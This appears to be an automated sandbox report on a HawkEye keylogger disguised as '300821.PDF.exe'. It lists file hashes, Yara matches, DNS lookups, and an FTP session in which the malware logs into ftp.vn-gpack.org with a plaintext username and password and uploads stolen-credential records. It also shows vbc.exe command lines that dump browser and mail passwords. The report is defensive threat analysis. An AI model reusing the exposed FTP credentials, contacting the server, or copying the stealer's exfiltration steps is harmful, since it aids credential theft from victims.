                                                                                                                                                                    SSDEEP:3:Dd:B
                                                                                                                                                                    MD5:5A2756A3CB9CDE852CAD3C97E120B656
                                                                                                                                                                    SHA1:1BA65BC81EE7D284E60782ECD3308EC517B73B82
                                                                                                                                                                    SHA-256:95F180E417E425F00E97C5A95BFE534C0B1C90D9D8115C9ACAD2C04C8D6CB246
                                                                                                                                                                    SHA-512:06BFD8C0391AB013E57F0B422A2AFDF73C810ABC0AFFE45717EAAA5FD68F0BCDA8D26D42F6B064D693951C9C481E466393DA2020D2F82F898EF84BB343516F74
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview: 2848
                                                                                                                                                                    C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                                                                                                    Process:C:\Users\user\Desktop\300821.PDF.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):37
                                                                                                                                                                    Entropy (8bit):4.247030650103631
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:oNt+WfWWVEXoA:oNwvWVmoA
                                                                                                                                                                    MD5:132D6BAEE131E302BCF347807AA06DE3
                                                                                                                                                                    SHA1:0CC45AF10E562B4D26A27A5B6731FCFCC7DC6F01
                                                                                                                                                                    SHA-256:9DE550232E6E9D639391A3D4A1E7A8B3F745B822D43856C562F5DD7439F5EB93
                                                                                                                                                                    SHA-512:C32670ADCB6E052B3909B9837E7BDD72E89BBEA23B806B16E44C49486EF92A795DED85880D15E836088D1EF80F1D5556B03E5A7CC0B0ACE80844677CFF7E2D9E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview: C:\Users\user\Desktop\300821.PDF.exe

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Entropy (8bit):7.076704069722482
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                    File name:300821.PDF.exe
                                                                                                                                                                    File size:987136
                                                                                                                                                                    MD5:ddfc57b8fd3e5e0f81dee8ead0e38518
                                                                                                                                                                    SHA1:ca35000ed1844f30e932d8903633e4beb519967f
                                                                                                                                                                    SHA256:c1cd0692836798f5cb7e9335f4547a2650b77cf456193cbe7e384906a20c0603
                                                                                                                                                                    SHA512:083bc3c27ddefbf541b91ef71728a2e3831563be171f4d7ca63dea9e04357533d2bf345c7ccdced551cc8220826d79f894b43f1de2ae8d3fd17a39c1bf838fcc
                                                                                                                                                                    SSDEEP:12288:MeTvtJpA3OXv2BFokZRhXQ5TZaRPlPO0E09wrp:MeDtJSO/2ffxA5TZaP20Eh9
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....",a..............0..............$... ........@.. ....................................@................................

                                                                                                                                                                    File Icon

                                                                                                                                                                    Icon Hash:00828e8e8686b000

                                                                                                                                                                    Network Behavior

                                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                    08/30/21-06:55:26.317879TCP2020410ET TROJAN HawkEye Keylogger FTP4972321192.168.2.466.70.204.222

                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                    TCP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Aug 30, 2021 06:55:25.340967894 CEST4972321192.168.2.466.70.204.222
                                                                                                                                                                    Aug 30, 2021 06:55:25.447432995 CEST214972366.70.204.222192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:25.447601080 CEST4972321192.168.2.466.70.204.222
                                                                                                                                                                    Aug 30, 2021 06:55:25.554527044 CEST214972366.70.204.222192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:25.555402994 CEST4972321192.168.2.466.70.204.222
                                                                                                                                                                    Aug 30, 2021 06:55:25.661679983 CEST214972366.70.204.222192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:25.661725044 CEST214972366.70.204.222192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:25.661969900 CEST4972321192.168.2.466.70.204.222
                                                                                                                                                                    Aug 30, 2021 06:55:25.780798912 CEST214972366.70.204.222192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:25.781213999 CEST4972321192.168.2.466.70.204.222
                                                                                                                                                                    Aug 30, 2021 06:55:25.887681007 CEST214972366.70.204.222192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:25.888890028 CEST4972321192.168.2.466.70.204.222
                                                                                                                                                                    Aug 30, 2021 06:55:25.995340109 CEST214972366.70.204.222192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:25.995663881 CEST4972321192.168.2.466.70.204.222
                                                                                                                                                                    Aug 30, 2021 06:55:26.102369070 CEST214972366.70.204.222192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:26.102632046 CEST4972321192.168.2.466.70.204.222
                                                                                                                                                                    Aug 30, 2021 06:55:26.209256887 CEST214972366.70.204.222192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:26.210165024 CEST4972451945192.168.2.466.70.204.222
                                                                                                                                                                    Aug 30, 2021 06:55:26.256638050 CEST4972321192.168.2.466.70.204.222
                                                                                                                                                                    Aug 30, 2021 06:55:26.317151070 CEST519454972466.70.204.222192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:26.317302942 CEST4972451945192.168.2.466.70.204.222
                                                                                                                                                                    Aug 30, 2021 06:55:26.317878962 CEST4972321192.168.2.466.70.204.222
                                                                                                                                                                    Aug 30, 2021 06:55:26.427908897 CEST214972366.70.204.222192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:26.428318977 CEST4972451945192.168.2.466.70.204.222
                                                                                                                                                                    Aug 30, 2021 06:55:26.430119991 CEST4972451945192.168.2.466.70.204.222
                                                                                                                                                                    Aug 30, 2021 06:55:26.431380033 CEST4972451945192.168.2.466.70.204.222
                                                                                                                                                                    Aug 30, 2021 06:55:26.475378990 CEST4972321192.168.2.466.70.204.222
                                                                                                                                                                    Aug 30, 2021 06:55:26.535387039 CEST519454972466.70.204.222192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:26.537137985 CEST519454972466.70.204.222192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:26.538290977 CEST519454972466.70.204.222192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:26.538450003 CEST4972451945192.168.2.466.70.204.222
                                                                                                                                                                    Aug 30, 2021 06:55:26.541986942 CEST214972366.70.204.222192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:26.584933996 CEST4972321192.168.2.466.70.204.222

                                                                                                                                                                    UDP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Aug 30, 2021 06:54:52.726234913 CEST4971453192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:54:52.760011911 CEST53497148.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:07.221765995 CEST5802853192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:07.264961958 CEST53580288.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:07.652231932 CEST5309753192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:07.696250916 CEST53530978.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:09.080276966 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:09.113172054 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:17.927989006 CEST5315753192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:17.953084946 CEST53531578.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:23.849796057 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:23.882658958 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:25.124269009 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:25.328469038 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:37.930924892 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:38.003427029 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:38.803896904 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:38.836663961 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:39.198126078 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:39.239734888 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:39.673118114 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:39.705575943 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:40.531435966 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:40.566447020 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:41.525831938 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:41.555313110 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:42.293961048 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:42.329674006 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:43.149346113 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:43.182962894 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:44.341959953 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:44.381015062 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:45.454276085 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:45.488651991 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:46.417253971 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:46.450968027 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:57.807853937 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:57.854103088 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:58.032663107 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:58.077951908 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:56:00.492620945 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:56:00.525834084 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:56:33.627084017 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:56:33.662800074 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:56:37.758372068 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:56:37.790934086 CEST53615228.8.8.8192.168.2.4

                                                                                                                                                                    DNS Queries

                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                    Aug 30, 2021 06:55:09.080276966 CEST192.168.2.48.8.8.80x9257Standard query (0)240.163.3.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                                                                                                    Aug 30, 2021 06:55:25.124269009 CEST192.168.2.48.8.8.80xc7d5Standard query (0)ftp.vn-gpack.orgA (IP address)IN (0x0001)

                                                                                                                                                                    DNS Answers

                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                    Aug 30, 2021 06:55:09.113172054 CEST8.8.8.8192.168.2.40x9257Name error (3)240.163.3.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                                                                                                    Aug 30, 2021 06:55:17.953084946 CEST8.8.8.8192.168.2.40x52b2No error (0)a-0019.a.dns.azurefd.neta-0019.standard.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                    Aug 30, 2021 06:55:25.328469038 CEST8.8.8.8192.168.2.40xc7d5No error (0)ftp.vn-gpack.org66.70.204.222A (IP address)IN (0x0001)

                                                                                                                                                                    FTP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                                    Aug 30, 2021 06:55:25.554527044 CEST214972366.70.204.222192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                                                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.
                                                                                                                                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 08:55. Server port: 21.
                                                                                                                                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 08:55. Server port: 21.220-This is a private system - No anonymous login
                                                                                                                                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 08:55. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                                                                                                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 08:55. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                                                                                    Aug 30, 2021 06:55:25.555402994 CEST4972321192.168.2.466.70.204.222USER Nwwwlooggs@vn-gpack.org
                                                                                                                                                                    Aug 30, 2021 06:55:25.661725044 CEST214972366.70.204.222192.168.2.4331 User Nwwwlooggs@vn-gpack.org OK. Password required
                                                                                                                                                                    Aug 30, 2021 06:55:25.661969900 CEST4972321192.168.2.466.70.204.222PASS @!V8[3L!PsE1
                                                                                                                                                                    Aug 30, 2021 06:55:25.780798912 CEST214972366.70.204.222192.168.2.4230 OK. Current restricted directory is /
                                                                                                                                                                    Aug 30, 2021 06:55:25.887681007 CEST214972366.70.204.222192.168.2.4504 Unknown command
                                                                                                                                                                    Aug 30, 2021 06:55:25.888890028 CEST4972321192.168.2.466.70.204.222PWD
                                                                                                                                                                    Aug 30, 2021 06:55:25.995340109 CEST214972366.70.204.222192.168.2.4257 "/" is your current location
                                                                                                                                                                    Aug 30, 2021 06:55:25.995663881 CEST4972321192.168.2.466.70.204.222TYPE I
                                                                                                                                                                    Aug 30, 2021 06:55:26.102369070 CEST214972366.70.204.222192.168.2.4200 TYPE is now 8-bit binary
                                                                                                                                                                    Aug 30, 2021 06:55:26.102632046 CEST4972321192.168.2.466.70.204.222PASV
                                                                                                                                                                    Aug 30, 2021 06:55:26.209256887 CEST214972366.70.204.222192.168.2.4227 Entering Passive Mode (66,70,204,222,202,233)
                                                                                                                                                                    Aug 30, 2021 06:55:26.317878962 CEST4972321192.168.2.466.70.204.222STOR HawkEye_Keylogger_Stealer_Records_238576 8.30.2021 7:03:04 AM.txt
                                                                                                                                                                    Aug 30, 2021 06:55:26.427908897 CEST214972366.70.204.222192.168.2.4150 Accepted data connection
                                                                                                                                                                    Aug 30, 2021 06:55:26.541986942 CEST214972366.70.204.222192.168.2.4226-File successfully transferred
                                                                                                                                                                    226-File successfully transferred226 0.114 seconds (measured here), 13.08 Kbytes per second

                                                                                                                                                                    Code Manipulations

                                                                                                                                                                    Statistics

                                                                                                                                                                    Behavior

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    System Behavior

                                                                                                                                                                    Analysis Process: 300821.PDF.exe PID: 4816 Parent PID: 6592

                                                                                                                                                                    General

                                                                                                                                                                    Start time:06:54:57
                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                    Path:C:\Users\user\Desktop\300821.PDF.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:'C:\Users\user\Desktop\300821.PDF.exe'
                                                                                                                                                                    Imagebase:0xa60000
                                                                                                                                                                    File size:987136 bytes
                                                                                                                                                                    MD5 hash:DDFC57B8FD3E5E0F81DEE8EAD0E38518
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    Analysis Process: 300821.PDF.exe PID: 2848 Parent PID: 4816

                                                                                                                                                                    General

                                                                                                                                                                    Start time:06:55:05
                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                    Path:C:\Users\user\Desktop\300821.PDF.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\Desktop\300821.PDF.exe
                                                                                                                                                                    Imagebase:0x6f0000
                                                                                                                                                                    File size:987136 bytes
                                                                                                                                                                    MD5 hash:DDFC57B8FD3E5E0F81DEE8EAD0E38518
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    Analysis Process: vbc.exe PID: 1668 Parent PID: 2848

                                                                                                                                                                    General

                                                                                                                                                                    Start time:06:55:15
                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:1171592 bytes
                                                                                                                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.693074434.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    Analysis Process: vbc.exe PID: 5604 Parent PID: 2848

                                                                                                                                                                    General

                                                                                                                                                                    Start time:06:55:15
                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:1171592 bytes
                                                                                                                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000009.00000002.684649797.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    Disassembly

                                                                                                                                                                    Code Analysis

                                                                                                                                                                    Reset < >